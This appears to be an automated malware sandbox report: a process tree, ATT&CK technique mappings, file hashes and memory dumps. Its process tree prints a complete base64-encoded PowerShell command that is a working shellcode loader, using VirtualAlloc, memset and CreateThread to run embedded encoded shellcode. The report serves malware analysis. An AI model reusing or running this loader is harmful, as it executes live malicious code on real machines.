    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2688
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAA4AEEAMgBCACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAOABBADIAQgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiADgALAAwAHgAMgA1ACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAZQAwACwAMAB4AGQAYgAsADAAeABjAGMALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADIALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAYgAsADAAeABiADYALAAwAHgANgA5ACwAMAB4ADEANQAsADAAeABlAGYALAAwAHgAYQBmACwAMAB4AGUAMQAsADAAeABkADYALAAwAHgAMABmACwAMAB4ADMAMAAsADAAeAA5AGUALAAwAHgAZQA3ACwAMAB4AGQAZAAsADAAeABiADkALAAwAHgAYgBiACwAMAB4ADYAYwAsADAAeAA2AGEALAAwAHgAZQBiACwAMAB4ADcAMwAsADAAeABlADYALAAwAHgAMwBlACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAYQBhACwAMAB4AGEAYQAsADAAeAAxADcALAAwAHgANAA4ACwAMAB4ADAAMAAsADAAeABmADQALAAwAHgAYQBjACwAMAB4AGMANAAsADAAeABiAGQALAAwAHgAYwA5ACwAMAB4ADQAZAAsADAAeAAxADkALAAwAHgANwBlACwAMAB4ADgANQAsADAAeAA4AGUALAAwAHgAMwBiACwAMAB4ADAAMgAsADAAeABkADcALAAwAHgAYwAyACwAMAB4ADkAYgAsADAAeAAzAGIALAAwAHgAMQA4ACwAMAB4ADEANwAsADAAeABkAGQALAAwAHgANwBjACwAMAB4AGUAZgAsADAAeAA1AGQALAAwAHgAMwAyACwAMAB4AGQAMAAsADAAeABiADgALAAwAHgAMQA2ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYwBkACwAMAB4ADYAYgAsADAAeAAyADMALAAwAHgAZQA3ACwAMAB4ADAAMQAsADAAeABlADAALAAwAHgAMQBiACwAMAB4ADkAZgAsADAAeAAyADQALAAwAHgAMwA3ACwAMAB4AGUAZgAsADAAeAAxADMALAAwAHgAMgA3ACwAMAB4ADYAOAAsADAAeAA5AGIALAAwAHgAZgA0ACwAMAB4ADAANwAsADAAeABkADgALAAwAHgAMQA3ACwAMAB4ADQAYwAsADAAeAA1AGYALAAwAHgAZAA5ACwAMAB4AGYANAAsADAAeABjADgALAAwAHgAOQA2ACwAMAB4AGEAZAAsADAAeABjADYALAAwAHgAZQAzACwAMAB4AGQANwAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4ADMAMAAsADAAeABhAGMALAAwAHgAOQA5ACwAMAB4ADEANAAsADAAeAAwADkALAAwAHgANwAyACwAMAB4ADMANQAsADAAeAA1ADkALAAwAHgAYQA1ACwAMAB4ADcAZgAsADAAeAA0ADcALAAwAHgAOQBkACwAMAB4ADAAMgAsADAAeAA5AGYALAAwAHgAMwAyACwAMAB4AGQANQAsADAAeAA3ADAALAAwAHgAMgAyACwAMAB4ADQANQAsADAAeAAyAGUALAAwAHgAMABhACwAMAB4AGYAOAAsADAAeABjADAALAAwAHgAYgAxACwAMAB4AGEAYwAsADAAeAA4AGIALAAwAHgANwAzACwAMAB4ADEANgAsADAAeAA0AGMALAAwAHgANQA4ACwAMAB4AGUANQAsADAAeABkAGQALAAwAHgANAAyACwAMAB4ADEANQAsADAAeAA2ADEALAAwAHgAYgA5ACwAMAB4ADQANgAsADAAeABhADgALAAwAHgAYQA2ACwAMAB4AGIAMQAsADAAeAA3ADMALAAwAHgAMgAxACwAMAB4ADQAOQAsADAAeAAxADYALAAwAHgAZgAyACwAMAB4ADcAMQAsADAAeAA2AGUALAAwAHgAYgAyACwAMAB4ADUAZQAsADAAeAAyADIALAAwAHgAMABmACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgAOAA1ACwAMAB4ADMAMAAsADAAeABmADMALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAA5ADUALAAwAHgANwBmACwAMAB4ADAAMQAsADAAeAA2AGQALAAwAHgAYQA5ACwAMAB4ADcAZgAsADAAeABkADkALAAwAHgAOQAyACwAMAB4AGYANwAsADAAeAAxADcALAAwAHgAMQA1ACwAMAB4ADUAZQAsADAAeAAwADgALAAwAHgAZQA4ACwAMAB4ADMAMQAsADAAeABlADkALAAwAHgANwBiACwAMAB4AGQAYQAsADAAeAA5AGUALAAwAHgANAAxACwAMAB4ADEANAAsADAAeAA1ADYALAAwAHgANQA2ACwAMAB4ADQAZgAsADAAeABlADMALAAwAHgAZQBmACwAMAB4ADcAMAAsADAAeAA3ADAALAAwAHgAMwBiACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAOABmACwAMAB4AGIAYwAsADAAeABhADgALAAwAHgAMwA4ACwAMAB4ADQAYgAsADAAeABlADgALAAwAHgAZgA4ACwAMAB4ADUAMgAsADAAeAA3AGEALAAwAHgAOQAxACwAMAB4ADkAMgAsADAAeABhADIALAAwAHgAOAAzACwAMAB4ADQANAAsADAAeAAwAGUALAAwAHgAYQA5ACwAMAB4ADEAMwAsADAAeABhADcALAAwAHgANgA3ACwAMAB4AGEAYwAsADAAeAA4AGQALAAwAHgANABmACwAMAB4ADcAYQAsADAAeABhAGYALAAwAHgANAAwACwAMAB4AGMAYwAsADAAeABmADMALAAwAHgANAA5ACwAMAB4ADMAMgAsADAAeABiAGMALAAwAHgANQAzACwAMAB4AGMANgAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEANAAsADAAeABiADYALAAwAHgAOQBhACwAMAB4ADYANgAsADAAeAA5AGIALAAwAHgAZQA5ACwAMAB4AGIAYQAsADAAeAA4ADgALAAwAHgANwAxACwAMAB4ADgAMgAsADAAeAA1ADAALAAwAHgANgA3ACwAMAB4ADIAYwAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4ADEAZQAsADAAeAA3ADUALAAwAHgANwAwACwAMAB4ADYAZAAsADAAeABkAGUALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeABhAGQALAAwAHgANQA0ACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANgAzACwAMAB4ADkAZAAsADAAeAAyAGQALAAwAHgAMQAyACwAMAB4ADEAMwAsADAAeAA2AGQALAAwAHgANwA4ACwAMAB4ADQAOAAsADAAeABiADUALAAwAHgANwAyACwAMAB4ADUANgAsADAAeABlADcALAAwAHgAMwA5ACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYQBlACwAMAB4ADYAZQAsADAAeAA5AGYALAAwAHgANQBmACwAMAB4ADkANwAsADAAeAA1ADgALAAwAHgAMAAwACwAMAB4ADkAZgAsADAAeABmADIALAAwAHgAZAAzACwAMAB4ADgAOQAsADAAeAAzADUALAAwAHgAYgBkACwAMAB4ADgAYgAsADAAeABmADUALAAwAHgAZAA5ACwAMAB4ADMAZAAsADAAeAA0AGIALAAwAHgAYQAwACwAMAB4AGIAMwAsADAAeAAzAGQALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeABlADAALAAwAHgANgBkACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgAMwBkACwAMAB4ADAAMgAsADAAeABjAGIALAAwAHgAYwBlACwAMAB4AGIAZQAsADAAeAA3ADMALAAwAHgAYgA4ACwAMAB4ADUAOQAsADAAeABkADcALAAwAHgANwA5ACwAMAB4AGUANwAsADAAeABhAGUALAAwAHgANwA4ACwAMAB4ADgAMQAsADAAeABjADIALAAwAHgAMgBlACwAMAB4ADQANAAsADAAeAA1ADQALAAwAHgAMgBhACwAMAB4ADQANQAsADAAeABhADQALAAwAHgANgA0ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABoAFoAaQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAaABaAGkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGgAWgBpACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2976
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n2vvhxp0.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2740
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEEA3.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESEEA4.tmp

Filesize
1KB

MD5
b4c66a82db7642f1eb09f1358612c8c1

SHA1
c7e115eb2b11acc76292b2cc4b5c9ca2bd0dbc74

SHA256
620dc65fa6c105882c92f175aa82d0a5a82b9de8890012b717cd83fe499f1d59

SHA512
415b5850982e58b23c22438266d3bc3e6cad8d27a3ed6f841290c323a1f26eaef5c04f6b5cded9c6844130aa968b451c57a96cc2ddc1dfab5044fc8175db2980

Download Submit
C:\Users\Admin\AppData\Local\Temp\n2vvhxp0.dll

Filesize
3KB

MD5
805c1fe8934580854f8914fa71f9afcb

SHA1
2802f0ec46cf7e4c3e087038f4d9709c0597b198

SHA256
0a7d17506b3c0e2ddff2643f63170b4b2dba29bd1d05f3bddcef0326ded0274b

SHA512
1221c7479bf67011a32f97eb46139961addfa9e9ae4c4c52d23af14baf2cf4f20b2e03795036a38ec3b1444a0d84aa128072c8d81c447dd63d3dedb2f91f1487

Download Submit
C:\Users\Admin\AppData\Local\Temp\n2vvhxp0.pdb

Filesize
7KB

MD5
baca6fe137074a82b4a84de2b3eec5bb

SHA1
5f2ecf6557f032475bcef680f6da1035770b3a04

SHA256
e606cfa2d2522fba71c956e1707034495158874e638c8c27fd7c51abad3fa636

SHA512
af1cee73b9f847fce3f8eecd174162ad33cd5a33f3dd753b05b89e34db4d400b9a70c026bab76e486bdfc3962713c48b32f77714f411704d4875a03f55fc244c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MNRSEEELD5WZH7AH4Q53.temp

Filesize
7KB

MD5
a324a5b6c2a437682e662e91345bd72e

SHA1
6460a82e882defb419c4ff2a7f5db9b9a1f46315

SHA256
88fe196b721b192880b5775864d46e952ef4797a908531f3b1d31b0518fbaa9b

SHA512
bd0db4d744d4214fd2ff79798b6921d3a5a4d015e706e2a8b35035b3e8bb52356f4a4912d59c94ccc6ada271f7987f3fe9cbf8fd7da960cd9e8dd41b403ef400

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCEEA3.tmp

Filesize
652B

MD5
88e6b3b560bd92ac3e38196281fae250

SHA1
32f397b16a671f06bf380d23c8d392820063a606

SHA256
46f74699cd7bc3d00059186d263c260a05ea9c024b68e231b201ba8abb9c640d

SHA512
213b4690715588ee1292210906fee0abb42e7dd8ba7acbe279b9eb45fde002617a1569f849a1a1f4b20d6dd926f80a2f15f5996aa2481790ca90c42693ba43df

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n2vvhxp0.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n2vvhxp0.cmdline

Filesize
309B

MD5
0a5d33d430d769c7360499030c8f653e

SHA1
5220f806b6a2ad7efe0c51923cc56b2b7d96790b

SHA256
d2f63768cd746eb05bf808c5a75ccd6414217ce34a246e086ed07bd8c6b9dd00

SHA512
fd508917671bc7c72aef4e625a86f9ed5f91f0232d4f01f70db1a426bf62a30dc5d93b0cf71c2065a2bc68532fdd1e02982e1a2c093508fd64449dcd8a27e3ac

Download Submit
memory/2648-0-0x000007FEF61F3000-0x000007FEF61F4000-memory.dmp

Filesize
4KB

Download
memory/2648-32-0x000007FEF61F3000-0x000007FEF61F4000-memory.dmp

Filesize
4KB

Download
memory/2648-1-0x0000000000190000-0x000000000019A000-memory.dmp

Filesize
40KB

Download
memory/2688-13-0x000007FEF4190000-0x000007FEF4B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-8-0x00000000028A0000-0x00000000028A8000-memory.dmp

Filesize
32KB

Download
memory/2688-6-0x000007FEF444E000-0x000007FEF444F000-memory.dmp

Filesize
4KB

Download
memory/2688-7-0x000000001B430000-0x000000001B712000-memory.dmp

Filesize
2.9MB

Download
memory/2688-9-0x000007FEF4190000-0x000007FEF4B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-12-0x000007FEF4190000-0x000007FEF4B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-10-0x000007FEF4190000-0x000007FEF4B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-11-0x000007FEF4190000-0x000007FEF4B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-33-0x000007FEF4190000-0x000007FEF4B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-34-0x000007FEF444E000-0x000007FEF444F000-memory.dmp

Filesize
4KB

Download
memory/2976-31-0x0000000002A80000-0x0000000002A81000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads